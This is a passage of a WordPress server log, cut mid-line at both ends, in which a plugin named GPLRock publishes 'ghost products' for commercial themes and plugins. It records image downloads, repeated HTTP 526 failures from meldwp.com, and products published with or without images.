https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bbbcd444.jpg [05-Apr-2026 10:16:50 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-eu-energy-label-premium [05-Apr-2026 10:16:51 UTC] GPLRock: Image downloaded successfully for product ninja-forms-campaign-monitor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-550c6c64.jpg [05-Apr-2026 10:16:51 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-campaign-monitor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-550c6c64.jpg [05-Apr-2026 10:16:51 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-campaign-monitor [05-Apr-2026 10:16:53 UTC] GPLRock: Image downloaded successfully for product studiopress-news-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6ccc9eb9.jpg [05-Apr-2026 10:16:53 UTC] GPLRock: Using pre-downloaded image for product studiopress-news-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6ccc9eb9.jpg [05-Apr-2026 10:16:53 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-news-pro-genesis-wordpress-theme [05-Apr-2026 10:16:54 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-getresponse (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f59443f7.jpg [05-Apr-2026 10:16:55 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-getresponse: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f59443f7.jpg [05-Apr-2026 10:16:55 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-getresponse [05-Apr-2026 10:16:56 UTC] GPLRock: Image downloaded successfully for product themify-builder-audio (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-872033b0.jpg [05-Apr-2026 10:16:56 UTC] GPLRock: Using pre-downloaded image for product themify-builder-audio: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-872033b0.jpg [05-Apr-2026 10:16:56 UTC] GPLRock: Ghost product published with image - Product ID: themify-builder-audio [05-Apr-2026 10:16:58 UTC] GPLRock: Image downloaded successfully for product wpfomify-lifterlms-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9c10f690.jpg [05-Apr-2026 10:16:58 UTC] GPLRock: Using pre-downloaded image for product wpfomify-lifterlms-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9c10f690.jpg [05-Apr-2026 10:16:58 UTC] GPLRock: Ghost product published with image - Product ID: wpfomify-lifterlms-addon [05-Apr-2026 10:17:44 UTC] GPLRock: Image download failed for product flati-responsive-flat-design-bootstrap-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:17:46 UTC] GPLRock: Image download failed for product flati-responsive-flat-design-bootstrap-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:17:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flati---responsive-flat-design-bootstrap-template-14292.webp for product flati-responsive-flat-design-bootstrap-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:17:49 UTC] GPLRock: Image download failed for product flati-responsive-flat-design-bootstrap-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:17:51 UTC] GPLRock: Image download failed for product flati-responsive-flat-design-bootstrap-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:17:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flati---responsive-flat-design-bootstrap-template-14292.webp for product flati-responsive-flat-design-bootstrap-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:17:53 UTC] GPLRock WARNING: Image download failed for product flati-responsive-flat-design-bootstrap-template. URL: https://meldwp.com/wp-content/uploads/flati---responsive-flat-design-bootstrap-template-14292.webp [05-Apr-2026 10:17:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: flati-responsive-flat-design-bootstrap-template [05-Apr-2026 10:17:53 UTC] GPLRock: Image download failed for product personal-portfolio-wordpress-theme-tunis (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:17:55 UTC] GPLRock: Image download failed for product personal-portfolio-wordpress-theme-tunis (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:17:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/personal-portfolio-wordpress-theme--tunis-16176.webp for product personal-portfolio-wordpress-theme-tunis after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:17:57 UTC] GPLRock: Image download failed for product personal-portfolio-wordpress-theme-tunis (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:18:00 UTC] GPLRock: Image download failed for product personal-portfolio-wordpress-theme-tunis (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:18:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/personal-portfolio-wordpress-theme--tunis-16176.webp for product personal-portfolio-wordpress-theme-tunis after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:18:02 UTC] GPLRock WARNING: Image download failed for product personal-portfolio-wordpress-theme-tunis. URL: https://meldwp.com/wp-content/uploads/personal-portfolio-wordpress-theme--tunis-16176.webp [05-Apr-2026 10:18:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: personal-portfolio-wordpress-theme-tunis [05-Apr-2026 10:18:02 UTC] GPLRock: Image download failed for product feastco-restaurant-and-events-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:18:04 UTC] GPLRock: Image download failed for product feastco-restaurant-and-events-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:18:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/feastco---restaurant-and-events-wordpress-theme-3992.webp for product feastco-restaurant-and-events-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:18:06 UTC] GPLRock: Image download failed for product feastco-restaurant-and-events-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:18:08 UTC] GPLRock: Image download failed for product feastco-restaurant-and-events-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:18:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/feastco---restaurant-and-events-wordpress-theme-3992.webp for product feastco-restaurant-and-events-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:18:10 UTC] GPLRock WARNING: Image download failed for product feastco-restaurant-and-events-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/feastco---restaurant-and-events-wordpress-theme-3992.webp [05-Apr-2026 10:18:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: feastco-restaurant-and-events-wordpress-theme [05-Apr-2026 10:18:11 UTC] GPLRock: Image download failed for product museum-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:18:13 UTC] GPLRock: Image download failed for product museum-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:18:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/museum---responsive-wordpress-theme-5894.webp for product museum-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:18:15 UTC] GPLRock: Image download failed for product museum-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:18:17 UTC] GPLRock: Image download failed for product museum-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:18:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/museum---responsive-wordpress-theme-5894.webp for product museum-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:18:19 UTC] GPLRock WARNING: Image download failed for product museum-responsive-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/museum---responsive-wordpress-theme-5894.webp [05-Apr-2026 10:18:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: museum-responsive-wordpress-theme [05-Apr-2026 10:18:19 UTC] GPLRock: Image download failed for product hermes-multi-purpose-premium-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:18:21 UTC] GPLRock: Image download failed for product hermes-multi-purpose-premium-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:18:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hermes---multi-purpose-premium-responsive-wordpress-theme-14644.webp for product hermes-multi-purpose-premium-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:18:23 UTC] GPLRock: Image download failed for product hermes-multi-purpose-premium-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:18:26 UTC] GPLRock: Image download failed for product hermes-multi-purpose-premium-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:18:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hermes---multi-purpose-premium-responsive-wordpress-theme-14644.webp for product hermes-multi-purpose-premium-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:18:28 UTC] GPLRock WARNING: Image download failed for product hermes-multi-purpose-premium-responsive-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/hermes---multi-purpose-premium-responsive-wordpress-theme-14644.webp [05-Apr-2026 10:18:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hermes-multi-purpose-premium-responsive-wordpress-theme [05-Apr-2026 10:18:28 UTC] GPLRock: Image download failed for product dreampalace-single-property-real-estate-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:18:30 UTC] GPLRock: Image download failed for product dreampalace-single-property-real-estate-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:18:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dreampalace---single-property-real-estate-theme-10031.webp for product dreampalace-single-property-real-estate-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:18:32 UTC] GPLRock: Image download failed for product dreampalace-single-property-real-estate-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:18:34 UTC] GPLRock: Image download failed for product dreampalace-single-property-real-estate-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:18:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dreampalace---single-property-real-estate-theme-10031.webp for product dreampalace-single-property-real-estate-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:18:36 UTC] GPLRock WARNING: Image download failed for product dreampalace-single-property-real-estate-theme. URL: https://meldwp.com/wp-content/uploads/dreampalace---single-property-real-estate-theme-10031.webp [05-Apr-2026 10:18:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dreampalace-single-property-real-estate-theme [05-Apr-2026 10:18:36 UTC] GPLRock: Image download failed for product otaru-technology-digital-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:18:39 UTC] GPLRock: Image download failed for product otaru-technology-digital-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:18:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/otaru---technology--digital-agency-wordpress-theme-29200.webp for product otaru-technology-digital-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:18:41 UTC] GPLRock: Image download failed for product otaru-technology-digital-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:18:43 UTC] GPLRock: Image download failed for product otaru-technology-digital-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:18:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/otaru---technology--digital-agency-wordpress-theme-29200.webp for product otaru-technology-digital-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:18:45 UTC] GPLRock WARNING: Image download failed for product otaru-technology-digital-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/otaru---technology--digital-agency-wordpress-theme-29200.webp [05-Apr-2026 10:18:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: otaru-technology-digital-agency-wordpress-theme [05-Apr-2026 10:18:45 UTC] GPLRock: Image download failed for product srina-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:18:47 UTC] GPLRock: Image download failed for product srina-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:18:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/srina---creative-portfolio-wordpress-theme-12079.webp for product srina-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:18:50 UTC] GPLRock: Image download failed for product srina-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:18:52 UTC] GPLRock: Image download failed for product srina-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:18:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/srina---creative-portfolio-wordpress-theme-12079.webp for product srina-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:18:54 UTC] GPLRock WARNING: Image download failed for product srina-creative-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/srina---creative-portfolio-wordpress-theme-12079.webp [05-Apr-2026 10:18:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: srina-creative-portfolio-wordpress-theme [05-Apr-2026 10:18:54 UTC] GPLRock: Image download failed for product grankare-senior-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:18:56 UTC] GPLRock: Image download failed for product grankare-senior-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:18:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grankare---senior-care-wordpress-theme-946.webp for product grankare-senior-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:18:58 UTC] GPLRock: Image download failed for product grankare-senior-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:19:00 UTC] GPLRock: Image download failed for product grankare-senior-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:19:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grankare---senior-care-wordpress-theme-946.webp for product grankare-senior-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:19:02 UTC] GPLRock WARNING: Image download failed for product grankare-senior-care-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/grankare---senior-care-wordpress-theme-946.webp [05-Apr-2026 10:19:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: grankare-senior-care-wordpress-theme [05-Apr-2026 10:19:03 UTC] GPLRock: Image download failed for product bifrost-simple-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:19:05 UTC] GPLRock: Image download failed for product bifrost-simple-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:19:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bifrost---simple-elementor-wordpress-theme-26046.webp for product bifrost-simple-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:19:07 UTC] GPLRock: Image download failed for product bifrost-simple-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:19:09 UTC] GPLRock: Image download failed for product bifrost-simple-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:19:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bifrost---simple-elementor-wordpress-theme-26046.webp for product bifrost-simple-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:19:11 UTC] GPLRock WARNING: Image download failed for product bifrost-simple-elementor-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/bifrost---simple-elementor-wordpress-theme-26046.webp [05-Apr-2026 10:19:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bifrost-simple-elementor-wordpress-theme [05-Apr-2026 10:19:31 UTC] GPLRock: Image downloaded successfully for product medisine-medical-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-928e6ad0.webp [05-Apr-2026 10:19:31 UTC] GPLRock: Using pre-downloaded image for product medisine-medical-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-928e6ad0.webp [05-Apr-2026 10:19:31 UTC] GPLRock: Ghost product published with image - Product ID: medisine-medical-elementor-template-kit [05-Apr-2026 10:19:32 UTC] GPLRock: Image downloaded successfully for product mediscare-medical-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4a06fc35.webp [05-Apr-2026 10:19:32 UTC] GPLRock: Using pre-downloaded image for product mediscare-medical-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4a06fc35.webp [05-Apr-2026 10:19:32 UTC] GPLRock: Ghost product published with image - Product ID: mediscare-medical-service-elementor-template-kit [05-Apr-2026 10:19:34 UTC] GPLRock: Image downloaded successfully for product medicare-hospital-health-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-87e9e949.webp [05-Apr-2026 10:19:34 UTC] GPLRock: Using pre-downloaded image for product medicare-hospital-health-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-87e9e949.webp [05-Apr-2026 10:19:34 UTC] GPLRock: Ghost product published with image - Product ID: medicare-hospital-health-service-elementor-template-kit [05-Apr-2026 10:19:35 UTC] GPLRock: Image downloaded successfully for product medicalife-health-care-medical-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3b795459.jpg [05-Apr-2026 10:19:35 UTC] GPLRock: Using pre-downloaded image for product medicalife-health-care-medical-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3b795459.jpg [05-Apr-2026 10:19:35 UTC] GPLRock: Ghost product published with image - Product ID: medicalife-health-care-medical-elementor-template-kit [05-Apr-2026 10:19:37 UTC] GPLRock: Image downloaded successfully for product median-digital-marketing-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-868c8f89.webp [05-Apr-2026 10:19:37 UTC] GPLRock: Using pre-downloaded image for product median-digital-marketing-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-868c8f89.webp [05-Apr-2026 10:19:37 UTC] GPLRock: Ghost product published with image - Product ID: median-digital-marketing-agency-elementor-template-kit [05-Apr-2026 10:19:38 UTC] GPLRock: Image downloaded successfully for product meddaz-saas-medical-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-412769d7.webp [05-Apr-2026 10:19:38 UTC] GPLRock: Using pre-downloaded image for product meddaz-saas-medical-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-412769d7.webp [05-Apr-2026 10:19:38 UTC] GPLRock: Ghost product published with image - Product ID: meddaz-saas-medical-elementor-template-kit [05-Apr-2026 10:19:40 UTC] GPLRock: Image downloaded successfully for product marriata-hotel-resort-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-88ee49a6.jpg [05-Apr-2026 10:19:40 UTC] GPLRock: Using pre-downloaded image for product marriata-hotel-resort-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-88ee49a6.jpg [05-Apr-2026 10:19:40 UTC] GPLRock: Ghost product published with image - Product ID: marriata-hotel-resort-elementor-template-kit [05-Apr-2026 10:19:42 UTC] GPLRock: Image downloaded successfully for product marline-fishing-hunting-club-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8e4b5a09.jpg [05-Apr-2026 10:19:42 UTC] GPLRock: Using pre-downloaded image for product marline-fishing-hunting-club-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8e4b5a09.jpg [05-Apr-2026 10:19:42 UTC] GPLRock: Ghost product published with image - Product ID: marline-fishing-hunting-club-elementor-template-kit [05-Apr-2026 10:19:43 UTC] GPLRock: Image downloaded successfully for product markup-corporate-marketing-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-de9eca0d.webp [05-Apr-2026 10:19:43 UTC] GPLRock: Using pre-downloaded image for product markup-corporate-marketing-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-de9eca0d.webp [05-Apr-2026 10:19:43 UTC] GPLRock: Ghost product published with image - Product ID: markup-corporate-marketing-agency-elementor-template-kit [05-Apr-2026 10:19:45 UTC] GPLRock: Image downloaded successfully for product marketin-business-startup-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f760ae6a.webp [05-Apr-2026 10:19:45 UTC] GPLRock: Using pre-downloaded image for product marketin-business-startup-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f760ae6a.webp [05-Apr-2026 10:19:45 UTC] GPLRock: Ghost product published with image - Product ID: marketin-business-startup-agency-elementor-template-kit [05-Apr-2026 10:20:33 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-minimum-maximum-quantity-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-042caa21.jpg [05-Apr-2026 10:20:33 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-minimum-maximum-quantity-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-042caa21.jpg [05-Apr-2026 10:20:33 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-minimum-maximum-quantity-premium [05-Apr-2026 10:20:34 UTC] GPLRock: Image downloaded successfully for product ninja-forms-webhooks (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-48542f86.jpg [05-Apr-2026 10:20:34 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-webhooks: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-48542f86.jpg [05-Apr-2026 10:20:34 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-webhooks [05-Apr-2026 10:20:36 UTC] GPLRock: Image downloaded successfully for product seeko-community-site-builder-with-buddypress-superpowers (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ef691636.jpg [05-Apr-2026 10:20:36 UTC] GPLRock: Using pre-downloaded image for product seeko-community-site-builder-with-buddypress-superpowers: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ef691636.jpg [05-Apr-2026 10:20:36 UTC] GPLRock: Ghost product published with image - Product ID: seeko-community-site-builder-with-buddypress-superpowers [05-Apr-2026 10:20:38 UTC] GPLRock: Image downloaded successfully for product studiopress-magazine-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-509f1966.jpg [05-Apr-2026 10:20:38 UTC] GPLRock: Using pre-downloaded image for product studiopress-magazine-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-509f1966.jpg [05-Apr-2026 10:20:38 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-magazine-pro-genesis-wordpress-theme [05-Apr-2026 10:20:40 UTC] GPLRock: Image downloaded successfully for product heap-a-snappy-responsive-wordpress-blog-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1046f10d.jpg [05-Apr-2026 10:20:40 UTC] GPLRock: Using pre-downloaded image for product heap-a-snappy-responsive-wordpress-blog-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1046f10d.jpg [05-Apr-2026 10:20:40 UTC] GPLRock: Ghost product published with image - Product ID: heap-a-snappy-responsive-wordpress-blog-theme [05-Apr-2026 10:20:41 UTC] GPLRock: Image downloaded successfully for product knowhow-a-knowledge-base-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-78431ac6.jpg [05-Apr-2026 10:20:41 UTC] GPLRock: Using pre-downloaded image for product knowhow-a-knowledge-base-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-78431ac6.jpg [05-Apr-2026 10:20:41 UTC] GPLRock: Ghost product published with image - Product ID: knowhow-a-knowledge-base-wordpress-theme [05-Apr-2026 10:20:43 UTC] GPLRock: Image downloaded successfully for product fortuna-responsive-multi-purpose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-abb21546.jpg [05-Apr-2026 10:20:43 UTC] GPLRock: Using pre-downloaded image for product fortuna-responsive-multi-purpose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-abb21546.jpg [05-Apr-2026 10:20:43 UTC] GPLRock: Ghost product published with image - Product ID: fortuna-responsive-multi-purpose-wordpress-theme [05-Apr-2026 10:20:44 UTC] GPLRock: Image downloaded successfully for product typology-text-based-minimal-wordpress-blog-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b17c6399.jpg [05-Apr-2026 10:20:45 UTC] GPLRock: Using pre-downloaded image for product typology-text-based-minimal-wordpress-blog-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b17c6399.jpg [05-Apr-2026 10:20:45 UTC] GPLRock: Ghost product published with image - Product ID: typology-text-based-minimal-wordpress-blog-theme [05-Apr-2026 10:20:46 UTC] GPLRock: Image downloaded successfully for product give-manual-donations (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b0e036b8.jpg [05-Apr-2026 10:20:46 UTC] GPLRock: Using pre-downloaded image for product give-manual-donations: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b0e036b8.jpg [05-Apr-2026 10:20:46 UTC] GPLRock: Ghost product published with image - Product ID: give-manual-donations [05-Apr-2026 10:20:48 UTC] GPLRock: Image downloaded successfully for product newsplus-news-and-magazine-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e07e4716.jpg [05-Apr-2026 10:20:48 UTC] GPLRock: Using pre-downloaded image for product newsplus-news-and-magazine-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e07e4716.jpg [05-Apr-2026 10:20:48 UTC] GPLRock: Ghost product published with image - Product ID: newsplus-news-and-magazine-wordpress-theme [05-Apr-2026 10:21:43 UTC] GPLRock: Image download failed for product urim-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:21:45 UTC] GPLRock: Image download failed for product urim-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:21:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/urim---creative-agency-wordpress-theme-12487.webp for product urim-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:21:47 UTC] GPLRock: Image download failed for product urim-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:21:49 UTC] GPLRock: Image download failed for product urim-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:21:52 UTC] 